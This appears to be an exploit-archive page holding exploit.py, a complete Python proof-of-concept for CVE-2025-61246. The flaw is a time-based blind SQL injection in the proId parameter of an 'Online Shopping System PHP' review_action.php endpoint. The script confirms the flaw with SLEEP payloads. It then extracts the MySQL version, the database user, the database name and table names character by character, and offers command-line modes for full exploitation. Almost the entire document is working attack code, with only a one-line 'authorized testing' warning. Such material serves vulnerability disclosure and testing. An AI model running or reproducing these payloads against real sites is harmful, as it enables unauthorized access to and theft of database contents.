4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2025-61246 - SQL Injection PoC Exploit
Author: Govind Pratap Singh
Description: Automated exploitation tool for time-based blind SQL injection
             in Online Shopping System PHP - review_action.php endpoint
"""

import requests
import argparse
import time
import sys
import string
from urllib.parse import urlparse
from colorama import Fore, Style, init

# Initialize colorama
init(autoreset=True)

class SQLInjectionExploit:
    def __init__(self, target_url, timeout=5, proxy=None, verbose=False):
        self.target_url = target_url
        self.timeout = timeout
        self.proxy = {"http": proxy, "https": proxy} if proxy else None
        self.verbose = verbose
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })
        
    def log(self, message, level="info"):
        """Print colored log messages"""
        colors = {
            "info": Fore.CYAN,
            "success": Fore.GREEN,
            "warning": Fore.YELLOW,
            "error": Fore.RED,
            "progress": Fore.MAGENTA
        }
        print(f"{colors.get(level, Fore.WHITE)}[{level.upper()}] {message}{Style.RESET_ALL}")
    
    def send_payload(self, payload):
        """Send SQL injection payload and measure response time"""
        data = {"proId": payload}
        
        try:
            start_time = time.time()
            response = self.session.post(
                self.target_url,
                data=data,
                timeout=self.timeout + 10,
                proxies=self.proxy,
                verify=False
            )
            elapsed_time = time.time() - start_time
            
            if self.verbose:
                self.log(f"Payload: {payload[:50]}... | Response Time: {elapsed_time:.2f}s", "progress")
            
            return elapsed_time, response
        
        except requests.exceptions.Timeout:
            self.log("Request timeout - possible SQL injection confirmed", "warning")
            return self.timeout + 10, None
        except Exception as e:
            self.log(f"Error sending payload: {str(e)}", "error")
            return 0, None
    
    def detect_vulnerability(self):
        """Detect if the target is vulnerable to SQL injection"""
        self.log("Starting vulnerability detection...", "info")
        
        # Baseline request
        baseline_time, _ = self.send_payload("1")
        
        # Time-based SQL injection payload (5 second delay)
        sqli_payload = f"1' AND (SELECT 1 FROM (SELECT(SLEEP({self.timeout})))a)-- -"
        sqli_time, _ = self.send_payload(sqli_payload)
        
        # Check if there's a significant time difference
        if sqli_time - baseline_time >= self.timeout - 1:
            self.log("✓ Target is VULNERABLE to SQL Injection!", "success")
            self.log(f"  Baseline: {baseline_time:.2f}s | SQLi: {sqli_time:.2f}s", "success")
            return True
        else:
            self.log("✗ Target does not appear vulnerable", "warning")
            self.log(f"  Baseline: {baseline_time:.2f}s | SQLi: {sqli_time:.2f}s", "info")
            return False
    
    def extract_database_name(self):
        """Extract database name using time-based blind SQL injection"""
        self.log("Extracting database name...", "info")
        
        db_name = ""
        charset = string.ascii_lowercase + string.digits + "_"
        
        # First, get the length of database name
        for length in range(1, 50):
            payload = f"1' AND IF(LENGTH(DATABASE())={length}, SLEEP({self.timeout}), 0)-- -"
            elapsed_time, _ = self.send_payload(payload)
            
            if elapsed_time >= self.timeout - 1:
                self.log(f"Database name length: {length}", "success")
                break
        else:
            self.log("Could not determine database name length", "error")
            return None
        
        # Extract each character
        for position in range(1, length + 1):
            for char in charset:
                payload = f"1' AND IF(SUBSTRING(DATABASE(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
                elapsed_time, _ = self.send_payload(payload)
                
                if elapsed_time >= self.timeout - 1:
                    db_name += char
                    self.log(f"Database name: {db_name}", "progress")
                    break
        
        self.log(f"✓ Database name extracted: {db_name}", "success")
        return db_name
    
    def extract_mysql_version(self):
        """Extract MySQL version"""
        self.log("Extracting MySQL version...", "info")
        
        version = ""
        charset = string.digits + "."
        
        for position in range(1, 20):
            found = False
            for char in charset:
                payload = f"1' AND IF(SUBSTRING(VERSION(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
                elapsed_time, _ = self.send_payload(payload)
                
                if elapsed_time >= self.timeout - 1:
                    version += char
                    self.log(f"MySQL Version: {version}", "progress")
                    found = True
                    break
            
            if not found:
                break
        
        self.log(f"✓ MySQL version: {version}", "success")
        return version
    
    def extract_current_user(self):
        """Extract current database user"""
        self.log("Extracting current database user...", "info")
        
        user = ""
        charset = string.ascii_lowercase + string.digits + "@._-"
        
        # Get length
        for length in range(1, 100):
            payload = f"1' AND IF(LENGTH(USER())={length}, SLEEP({self.timeout}), 0)-- -"
            elapsed_time, _ = self.send_payload(payload)
            
            if elapsed_time >= self.timeout - 1:
                self.log(f"User length: {length}", "success")
                break
        else:
            self.log("Could not determine user length", "error")
            return None
        
        # Extract each character
        for position in range(1, length + 1):
            for char in charset:
                payload = f"1' AND IF(SUBSTRING(USER(),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
                elapsed_time, _ = self.send_payload(payload)
                
                if elapsed_time >= self.timeout - 1:
                    user += char
                    self.log(f"Current user: {user}", "progress")
                    break
        
        self.log(f"✓ Current user: {user}", "success")
        return user
    
    def count_tables(self):
        """Count number of tables in current database"""
        self.log("Counting tables in database...", "info")
        
        for count in range(1, 100):
            payload = f"1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())={count}, SLEEP({self.timeout}), 0)-- -"
            elapsed_time, _ = self.send_payload(payload)
            
            if elapsed_time >= self.timeout - 1:
                self.log(f"✓ Number of tables: {count}", "success")
                return count
        
        self.log("Could not determine table count", "error")
        return None
    
    def extract_table_names(self, limit=5):
        """Extract table names from current database"""
        self.log(f"Extracting table names (limit: {limit})...", "info")
        
        tables = []
        charset = string.ascii_lowercase + string.digits + "_"
        
        for table_index in range(limit):
            table_name = ""
            
            # Get table name length
            for length in range(1, 50):
                payload = f"1' AND IF(LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {table_index},1))={length}, SLEEP({self.timeout}), 0)-- -"
                elapsed_time, _ = self.send_payload(payload)
                
                if elapsed_time >= self.timeout - 1:
                    break
            else:
                break  # No more tables
            
            # Extract each character
            for position in range(1, length + 1):
                for char in charset:
                    payload = f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {table_index},1),{position},1)='{char}', SLEEP({self.timeout}), 0)-- -"
                    elapsed_time, _ = self.send_payload(payload)
                    
                    if elapsed_time >= self.timeout - 1:
                        table_name += char
                        self.log(f"Table {table_index + 1}: {table_name}", "progress")
                        break
            
            if table_name:
                tables.append(table_name)
                self.log(f"✓ Table extracted: {table_name}", "success")
        
        return tables
    
    def full_exploitation(self):
        """Perform full exploitation chain"""
        self.log("=" * 60, "info")
        self.log("CVE-2025-61246 - Full Exploitation Mode", "info")
        self.log("=" * 60, "info")
        
        if not self.detect_vulnerability():
            self.log("Target is not vulnerable. Exiting.", "error")
            return
        
        print()
        
        # Extract information
        mysql_version = self.extract_mysql_version()
        print()
        
        current_user = self.extract_current_user()
        print()
        
        db_name = self.extract_database_name()
        print()
        
        table_count = self.count_tables()
        print()
        
        if table_count and table_count > 0:
            tables = self.extract_table_names(min(3, table_count))
        
        print()
        self.log("=" * 60, "info")
        self.log("Exploitation Summary", "success")
        self.log("=" * 60, "info")
        self.log(f"MySQL Version: {mysql_version}", "info")
        self.log(f"Current User: {current_user}", "info")
        self.log(f"Database Name: {db_name}", "info")
        self.log(f"Table Count: {table_count}", "info")
        if tables:
            self.log(f"Sample Tables: {', '.join(tables)}", "info")
        self.log("=" * 60, "info")


def print_banner():
    """Print tool banner"""
    banner = f"""
{Fore.RED}╔═══════════════════════════════════════════════════════════╗
║                                                           ║
║           CVE-2025-61246 SQL Injection PoC                ║
║        Online Shopping System PHP - Exploit Tool          ║
║                                                           ║
║              Discovered by: Govind Pratap Singh           ║
║                                                           ║
╚═══════════════════════════════════════════════════════════╝{Style.RESET_ALL}
    """
    print(banner)


def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="CVE-2025-61246 SQL Injection Exploitation Tool",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python exploit.py --url http://target.com/review_action.php --detect-only
  python exploit.py --url http://target.com/review_action.php --extract-db
  python exploit.py --url http://target.com/review_action.php --full-exploit
  python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
        """
    )
    
    parser.add_argument("-u", "--url", required=True, help="Target URL (review_action.php endpoint)")
    parser.add_argument("-d", "--detect-only", action="store_true", help="Only detect vulnerability")
    parser.add_argument("-e", "--extract-db", action="store_true", help="Extract database name")
    parser.add_argument("-f", "--full-exploit", action="store_true", help="Full exploitation mode")
    parser.add_argument("-t", "--timeout", type=int, default=5, help="SQL delay timeout (default: 5)")
    parser.add_argument("-p", "--proxy", help="Proxy URL (e.g., http://127.0.0.1:8080)")
    parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
    
    args = parser.parse_args()
    
    # Validate URL
    try:
        result = urlparse(args.url)
        if not all([result.scheme, result.netloc]):
            print(f"{Fore.RED}[ERROR] Invalid URL format{Style.RESET_ALL}")
            sys.exit(1)
    except Exception:
        print(f"{Fore.RED}[ERROR] Invalid URL{Style.RESET_ALL}")
        sys.exit(1)
    
    # Initialize exploit
    exploit = SQLInjectionExploit(
        target_url=args.url,
        timeout=args.timeout,
        proxy=args.proxy,
        verbose=args.verbose
    )
    
    # Execute based on arguments
    if args.detect_only:
        exploit.detect_vulnerability()
    elif args.extract_db:
        if exploit.detect_vulnerability():
            print()
            exploit.extract_database_name()
    elif args.full_exploit:
        exploit.full_exploitation()
    else:
        # Default: detection only
        exploit.detect_vulnerability()
    
    print()
    print(f"{Fore.YELLOW}[WARNING] This tool is for authorized testing only!{Style.RESET_ALL}")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n{Fore.YELLOW}[!] Interrupted by user{Style.RESET_ALL}")
        sys.exit(0)
    except Exception as e:
        print(f"{Fore.RED}[ERROR] {str(e)}{Style.RESET_ALL}")
        sys.exit(1)